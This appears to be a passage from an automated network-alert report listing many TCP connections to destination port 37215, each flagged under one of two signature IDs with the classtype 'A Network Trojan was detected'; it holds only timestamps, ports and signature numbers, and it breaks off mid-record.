          Timestamp:05/28/24-14:47:12.876245
          SID:2835222
          Source Port:54904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.372155
          SID:2829579
          Source Port:37280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.996582
          SID:2829579
          Source Port:37622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960639
          SID:2829579
          Source Port:42536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.770992
          SID:2829579
          Source Port:59730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124432
          SID:2829579
          Source Port:57264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767684
          SID:2835222
          Source Port:45234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.923199
          SID:2835222
          Source Port:59712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269685
          SID:2835222
          Source Port:50866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542174
          SID:2829579
          Source Port:33226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663870
          SID:2835222
          Source Port:44494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767963
          SID:2835222
          Source Port:49092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201283
          SID:2835222
          Source Port:41692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402368
          SID:2835222
          Source Port:35932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.189054
          SID:2835222
          Source Port:53394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272413
          SID:2835222
          Source Port:35550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466182
          SID:2835222
          Source Port:34656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591963
          SID:2829579
          Source Port:52306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.940926
          SID:2835222
          Source Port:37762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.499848
          SID:2829579
          Source Port:51344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116657
          SID:2835222
          Source Port:44430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815505
          SID:2835222
          Source Port:38756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.803850
          SID:2829579
          Source Port:58394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474551
          SID:2829579
          Source Port:60796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.136798
          SID:2829579
          Source Port:54796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.015872
          SID:2829579
          Source Port:59186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497566
          SID:2835222
          Source Port:48424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878361
          SID:2835222
          Source Port:46664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.805005
          SID:2829579
          Source Port:58676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.282029
          SID:2829579
          Source Port:60500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560462
          SID:2829579
          Source Port:49114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156071
          SID:2835222
          Source Port:52962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.230268
          SID:2835222
          Source Port:60140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.562866
          SID:2829579
          Source Port:32850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.889177
          SID:2829579
          Source Port:55806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405322
          SID:2829579
          Source Port:51136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.173553
          SID:2835222
          Source Port:34478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.473602
          SID:2835222
          Source Port:39152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724498
          SID:2829579
          Source Port:33328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774269
          SID:2835222
          Source Port:33140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.240621
          SID:2829579
          Source Port:49488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.481766
          SID:2835222
          Source Port:36004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939248
          SID:2835222
          Source Port:53462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.855659
          SID:2829579
          Source Port:58684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650210
          SID:2829579
          Source Port:50956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.973859
          SID:2835222
          Source Port:57112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298516
          SID:2829579
          Source Port:52040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939558
          SID:2835222
          Source Port:40430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268786
          SID:2835222
          Source Port:37320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760422
          SID:2829579
          Source Port:56998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266258
          SID:2829579
          Source Port:52552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268477
          SID:2835222
          Source Port:58584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.281734
          SID:2835222
          Source Port:45974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845276
          SID:2829579
          Source Port:34806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.085355
          SID:2829579
          Source Port:47184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.285165
          SID:2829579
          Source Port:44540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.311114
          SID:2829579
          Source Port:33634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.159083
          SID:2835222
          Source Port:58218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.986162
          SID:2829579
          Source Port:56380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.513318
          SID:2835222
          Source Port:60984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.695779
          SID:2835222
          Source Port:58326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767120
          SID:2835222
          Source Port:44356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.813324
          SID:2829579
          Source Port:59340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.662902
          SID:2829579
          Source Port:50106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322265
          SID:2829579
          Source Port:44476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.040267
          SID:2829579
          Source Port:46066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665601
          SID:2829579
          Source Port:33204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.239284
          SID:2835222
          Source Port:34192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334116
          SID:2835222
          Source Port:42048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.498807
          SID:2835222
          Source Port:53170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793865
          SID:2829579
          Source Port:39704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497838
          SID:2829579
          Source Port:43590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.698305
          SID:2835222
          Source Port:53482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208285
          SID:2835222
          Source Port:44374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.220947
          SID:2829579
          Source Port:60316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.217151
          SID:2835222
          Source Port:42856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735590
          SID:2835222
          Source Port:40102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689442
          SID:2829579
          Source Port:53246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325866
          SID:2829579
          Source Port:46452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.246981
          SID:2829579
          Source Port:49566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.910335
          SID:2829579
          Source Port:45546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.427701
          SID:2829579
          Source Port:36612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.130658
          SID:2829579
          Source Port:44410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.772780
          SID:2835222
          Source Port:51720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196725
          SID:2835222
          Source Port:60860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.690068
          SID:2835222
          Source Port:55810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778308
          SID:2829579
          Source Port:40342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.296072
          SID:2835222
          Source Port:48886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594872
          SID:2829579
          Source Port:40374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.545891
          SID:2835222
          Source Port:46418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.063233
          SID:2835222
          Source Port:35568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102763
          SID:2835222
          Source Port:37890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.225799
          SID:2835222
          Source Port:39192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551188
          SID:2835222
          Source Port:44382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711020
          SID:2835222
          Source Port:52802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.622929
          SID:2835222
          Source Port:53426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062796
          SID:2829579
          Source Port:42234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.805024
          SID:2835222
          Source Port:48986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989503
          SID:2835222
          Source Port:49300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.926609
          SID:2829579
          Source Port:55864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803850
          SID:2829579
          Source Port:44806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.374579
          SID:2829579
          Source Port:43824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327899
          SID:2835222
          Source Port:43738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.961574
          SID:2835222
          Source Port:57044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215038
          SID:2835222
          Source Port:40918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.601389
          SID:2829579
          Source Port:33370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.933471
          SID:2835222
          Source Port:49254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325972
          SID:2829579
          Source Port:51976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.922335
          SID:2835222
          Source Port:46642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741488
          SID:2829579
          Source Port:44976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.225392
          SID:2829579
          Source Port:50640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273278
          SID:2835222
          Source Port:42714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.355820
          SID:2835222
          Source Port:54760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959664
          SID:2829579
          Source Port:48270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.475387
          SID:2829579
          Source Port:43560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923130
          SID:2835222
          Source Port:49770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211706
          SID:2829579
          Source Port:52478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.615392
          SID:2835222
          Source Port:57526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338068
          SID:2829579
          Source Port:35680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266445
          SID:2829579
          Source Port:48176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652474
          SID:2835222
          Source Port:60472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.112962
          SID:2829579
          Source Port:52304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989042
          SID:2835222
          Source Port:51822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.010464
          SID:2829579
          Source Port:41356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.804666
          SID:2829579
          Source Port:52300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.185850
          SID:2829579
          Source Port:60370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201171
          SID:2829579
          Source Port:52366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126823
          SID:2835222
          Source Port:41346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.808243
          SID:2835222
          Source Port:55490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339716
          SID:2835222
          Source Port:59250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.684410
          SID:2835222
          Source Port:56388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.374642
          SID:2829579
          Source Port:37996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201227
          SID:2829579
          Source Port:38698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.814108
          SID:2829579
          Source Port:35984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326718
          SID:2829579
          Source Port:45822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.995702
          SID:2835222
          Source Port:57642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.668533
          SID:2835222
          Source Port:47922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267565
          SID:2835222
          Source Port:43986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283650
          SID:2835222
          Source Port:43080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156320
          SID:2829579
          Source Port:54168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177283
          SID:2829579
          Source Port:43148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273265
          SID:2829579
          Source Port:53046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561757
          SID:2835222
          Source Port:59270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.037636
          SID:2829579
          Source Port:42408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116941
          SID:2829579
          Source Port:39158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.565234
          SID:2835222
          Source Port:47912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.913295
          SID:2835222
          Source Port:35150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594593
          SID:2835222
          Source Port:58600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.629080
          SID:2835222
          Source Port:37616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.763742
          SID:2835222
          Source Port:55076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.813583
          SID:2835222
          Source Port:47304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271392
          SID:2835222
          Source Port:37398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652451
          SID:2835222
          Source Port:56084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324620
          SID:2829579
          Source Port:45452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.862012
          SID:2829579
          Source Port:49480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.804403
          SID:2835222
          Source Port:45052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214493
          SID:2829579
          Source Port:50202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287569
          SID:2835222
          Source Port:51392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745843
          SID:2835222
          Source Port:40880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.766474
          SID:2829579
          Source Port:49872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338685
          SID:2835222
          Source Port:42130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.629114
          SID:2829579
          Source Port:48700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770721
          SID:2835222
          Source Port:36606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.283686
          SID:2829579
          Source Port:43326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401489
          SID:2835222
          Source Port:34524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369488
          SID:2835222
          Source Port:58498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183151
          SID:2835222
          Source Port:46476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846932
          SID:2835222
          Source Port:45984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044748
          SID:2835222
          Source Port:47424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322337
          SID:2835222
          Source Port:39516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665367
          SID:2835222
          Source Port:59090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299040
          SID:2835222
          Source Port:44816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140260
          SID:2829579
          Source Port:51094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462493
          SID:2829579
          Source Port:54220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272367
          SID:2829579
          Source Port:41668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847523
          SID:2829579
          Source Port:54592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272238
          SID:2835222
          Source Port:37790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144720
          SID:2835222
          Source Port:37370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.593150
          SID:2835222
          Source Port:53034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160912
          SID:2835222
          Source Port:51568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742376
          SID:2829579
          Source Port:48524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.230924
          SID:2829579
          Source Port:39230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196703
          SID:2829579
          Source Port:40418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403042
          SID:2835222
          Source Port:54482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.484772
          SID:2835222
          Source Port:48700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156793
          SID:2835222
          Source Port:36584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046584
          SID:2835222
          Source Port:58216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.713366
          SID:2835222
          Source Port:37776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.509541
          SID:2835222
          Source Port:42328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.373200
          SID:2835222
          Source Port:45688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.687032
          SID:2835222
          Source Port:55834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480237
          SID:2835222
          Source Port:54042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838432
          SID:2829579
          Source Port:58386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.976231
          SID:2835222
          Source Port:35046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663099
          SID:2835222
          Source Port:42316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.804438
          SID:2835222
          Source Port:36868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.868400
          SID:2829579
          Source Port:55380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211480
